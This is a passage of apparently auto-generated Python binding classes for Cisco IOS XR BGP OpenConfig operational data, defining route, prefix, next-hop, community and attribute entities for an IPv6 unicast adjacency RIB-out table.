**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved))])
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
"""
AggregatorList
.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
"""
CommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
"""
UnknownAttributes
.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
Atributevalue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
"""
LastModifiedDate
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes']['meta_info']
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
post\-policy table
.. attribute:: num_routes
NumRoutes
**type**\: int
